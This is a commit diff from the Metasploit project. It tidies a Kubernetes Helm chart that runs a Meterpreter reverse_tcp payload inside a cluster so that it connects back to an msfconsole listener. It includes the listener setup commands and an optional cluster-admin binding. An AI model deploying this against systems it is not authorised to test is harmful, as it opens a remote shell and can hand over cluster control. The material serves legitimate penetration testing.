Meterpreter Helm chart tweaks

adfoster-r7 · adfoster-r7 · commit ee093d0c21a6 · 2021-11-05T15:14:19.000Z
diff --git a/kubernetes/.gitignore b/kubernetes/.gitignore
@@ -1,3 +1,3 @@
 metasploit/charts
 metasploit.yaml
-meterpreter.yaml
+meterpreter.yaml
diff --git a/kubernetes/Makefile b/kubernetes/Makefile
@@ -1,26 +1,23 @@
-#
-# 
-#
 .SECONDARY:
 .SECONDEXPANSION:
 
 lint-charts: ##@Lint Lint Helm Chart
-	helm lint meterpreter    
+	helm lint meterpreter
 
 generate-deployment:	##@Generate Generate YAML based deployment
-	helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml   
+	helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml
 
 install-meterpreter: ##@meterpreter Install meterpreter chart
 	helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter
 
-delete-meterpreter: ##@meterpreter Delete meterpreter chart    
-	helm -n metasploit delete meterpreter    
+delete-meterpreter: ##@meterpreter Delete meterpreter chart
+	helm -n metasploit delete meterpreter
 
 
-create-kind-cluster:  ##@Test create KIND cluster
+create-kind-cluster:  ##@Test create kind cluster
 	kind create cluster --image kindest/node:v1.18.2 --name metasploit
 
-delete-kind-cluster:  ##@Test delete KIND cluster
+delete-kind-cluster:  ##@Test delete kind cluster
 	kind delete cluster --name metasploit
 
 
diff --git a/kubernetes/README.md b/kubernetes/README.md
@@ -1,46 +1,37 @@
+# Metasploit in Kubernetes
 
-# Running Metasploit Framework Against Kubernetes
-
-Running metasploit framework against Kubernetes enables pentesters to security test cluster components such as the API Server, as well as internal application components or micro-services.
-
-The installation chart (meterpreter) also offers to install & run a metasploit payload, that connects back to metasploit console.
-The payload can be deployed with different priviliges and permissions with respect to Kubernetes node hosting metasploit payload, as well as Kubernetes API server itself - see 'priviliges' section under values.yaml
-
-```yaml
-priviliges:
-  # Disable Kubernetes API Server Access - even to the discovery APIs
-  useServiceAccount: true
-  # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
-  bindClusterRole: "" #cluster-admin 
-
-  #
-  # Priviliges related to node hosting metasploit Pod
-  # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
-  podSecurityContext: {}
-    # fsGroup: 2000
-  # Metasploit container security context
-  securityContext: {}
-    #allowPrivilegeEscalation: false
-    # capabilities:
-    #   add:
-    #   - NET_BIND_SERVICE
-    #   drop:
-    #   - all
-    #runAsNonRoot: true
-    #runAsUser: 1000
-    #runAsGroup: 1000
-```
+The most common workflow to test a Kubernetes environment with Metasploit is to target the Kubernetes API externally,
+or through a compromised container - both of these workflows are currently supported directly within msfconsole.
+
+An alternative to compromising a Kubernetes container to gain a Meterpreter session is to install the `meterpreter` helm chart into
+a Kubernetes environment directly. This newly opened Meterpreter session will act as the pivot point for running additional
+Metasploit modules, similar to the behavior of compromising an existing Kubernetes container with msfconsole.
 
-# Installation
+## Installation
 
-1. Make sure helm (version 3 or above) is [installed](https://helm.sh/docs/intro/install/)
-2. Make sure you have an available Kubernetes cluster to deploy metasploit. You can install a local Kubernetes cluster using [KIND](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
-    > You can create local KIND cluster by running  `make create-kind-cluster`
+To install the Metasploit resources in to your Kubernetes environment: 
+
+1. Make sure [Helm](https://helm.sh/) (version 3 or above) is [installed](https://helm.sh/docs/intro/install/)
+2. Make sure you have an available Kubernetes cluster to deploy Metasploit. You can install a local Kubernetes cluster using [kind](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
+   You can create local kind cluster by running  `make create-kind-cluster`
+2. A penester should create a Metasploit listener from msfconsole:
+```
+use payload/linux/x64/meterpreter/reverse_tcp
+set LHOST x.x.x.x
+set LPORT 4444
+to_handler
+```
 
 3. Install meterpreter helm chart by running:
 
 ```sh
-export MSF_PORT="<routeable port from inside cluster>"
-export MSF_IPADDRESS="<routeable ip from inside cluster>"
-helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
+export LHOST="x.x.x.x"
+export LPORT="4444"
+helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lhost=$LHOST --set lport=$LPORT
 ```
+4. If the listener from step 3 was created, ensure you now have a Meterpreter session in msfconsole
+
+## Privileges
+
+The Meterpreter container can be deployed with different privileges and permissions - see the `privileges` section within
+[./meterpreter/values.yaml](values.yaml) for more details.
diff --git a/kubernetes/meterpreter/Chart.yaml b/kubernetes/meterpreter/Chart.yaml
@@ -10,9 +10,6 @@ keywords:
   - pentest
   - penetration testing
 home: https://www.metasploit.com/
-icon: https://www.metasploit.com/includes/images/metasploit-r7-logo.svg
+icon: https://www.metasploit.com/includes/images/metasploit-og.png
 sources:
 - https://github.com/rapid7/metasploit-framework
-maintainers:
-- email: msfdev@metasploit.com
-  name: Metasploit Hackers
diff --git a/kubernetes/meterpreter/templates/NOTES.txt b/kubernetes/meterpreter/templates/NOTES.txt
@@ -1 +1,8 @@
-Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}
+Make sure meterpreter connected to your Metasploit listener running at {{ .Values.lhost }}:{{ .Values.lport }}
+
+You can create a Metasploit listener with:
+
+use payload/linux/x64/meterpreter/reverse_tcp
+set LHOST {{ .Values.lhost }}
+set LPORT {{ .Values.lport }}
+to_handler
diff --git a/kubernetes/meterpreter/templates/deployment.yaml b/kubernetes/meterpreter/templates/deployment.yaml
@@ -18,17 +18,17 @@ spec:
       imagePullSecrets:
         {{- toYaml . | nindent 8 }}
     {{- end }}
-      {{- if .Values.priviliges.useServiceAccount }}
+      {{- if .Values.privileges.useServiceAccount }}
       serviceAccountName: {{ include "meterpreter.fullname" . }}
       {{ else }}
       automountServiceAccountToken: false
       {{ end }}
       securityContext:
-        {{- toYaml .Values.priviliges.podSecurityContext | nindent 8 }}
+        {{- toYaml .Values.privileges.podSecurityContext | nindent 8 }}
       initContainers:
         - name: msfvenome
           image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}"
-          imagePullPolicy: {{ .Values.image.pullPolicy }}        
+          imagePullPolicy: {{ .Values.image.pullPolicy }}
           command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"]
           env:
             - name: LHOST
@@ -41,23 +41,23 @@ spec:
             - name: msfvenome
               mountPath: /tmp/meterpreter.sh
               subPath: meterpreter.sh
-              
+
       containers:
         - name: {{ .Chart.Name }}
           image: gcr.io/google_containers/pause-amd64:3.0
-          imagePullPolicy: {{ .Values.image.pullPolicy }}        
+          imagePullPolicy: {{ .Values.image.pullPolicy }}
           command: ["/meterpreter/meterpreter"]
           tty: true
           stdin: true
           securityContext:
-            {{- toYaml .Values.priviliges.securityContext | nindent 12 }}
+            {{- toYaml .Values.privileges.securityContext | nindent 12 }}
 
           resources:
             {{- toYaml .Values.resources | nindent 12 }}
           volumeMounts:
             - name: meterpreter
               mountPath: /meterpreter
- 
+
       restartPolicy: Always
       volumes:
         - name: meterpreter
diff --git a/kubernetes/meterpreter/templates/rbac.yaml b/kubernetes/meterpreter/templates/rbac.yaml
@@ -1,4 +1,4 @@
-{{- if .Values.priviliges.useServiceAccount -}}
+{{- if .Values.privileges.useServiceAccount -}}
 apiVersion: v1
 kind: ServiceAccount
 metadata:
@@ -7,7 +7,7 @@ metadata:
     {{- include "meterpreter.labels" . | nindent 4 }}
 
 ---
-{{- if ne .Values.priviliges.bindClusterRole "" -}}
+{{- if ne .Values.privileges.bindClusterRole "" -}}
 apiVersion: rbac.authorization.k8s.io/v1
 kind: RoleBinding
 metadata:
@@ -17,7 +17,7 @@ metadata:
 roleRef:
   apiGroup: rbac.authorization.k8s.io
   kind: ClusterRole
-  name: {{ .Values.priviliges.bindClusterRole }}
+  name: {{ .Values.privileges.bindClusterRole }}
 subjects:
   - kind: ServiceAccount
     name: {{ include "meterpreter.fullname" . }}
diff --git a/kubernetes/meterpreter/values.yaml b/kubernetes/meterpreter/values.yaml
@@ -1,9 +1,9 @@
 # Default values for meterpreter.
 
 #The IP Address the payload will connect to
-lhost: 
+lhost:
 #The Port meterpreter will connect to
-lport: 
+lport:
 
 image:
   repository: metasploitframework/metasploit-framework
@@ -14,15 +14,15 @@ imagePullSecrets: []
 nameOverride: ""
 fullnameOverride: ""
 
-# Tune the priviliges your Kubernetes meterpreter will run with 
-priviliges:
+# Tune the privileges your Kubernetes meterpreter will run with
+privileges:
   # Disable Kubernetes API Server Access - even to the discovery APIs
   useServiceAccount: true
-  # Run metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
-  bindClusterRole: "" #cluster-admin 
+  # Run Metasploit framework as Kubernetes cluster admin (useServiceAccount must be true for this setting to be effective)
+  bindClusterRole: "" #cluster-admin
 
   #
-  # Priviliges related to node hosting metasploit Pod
+  # Privileges related to node hosting metasploit Pod
   # See: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
   podSecurityContext: {}
     # fsGroup: 2000
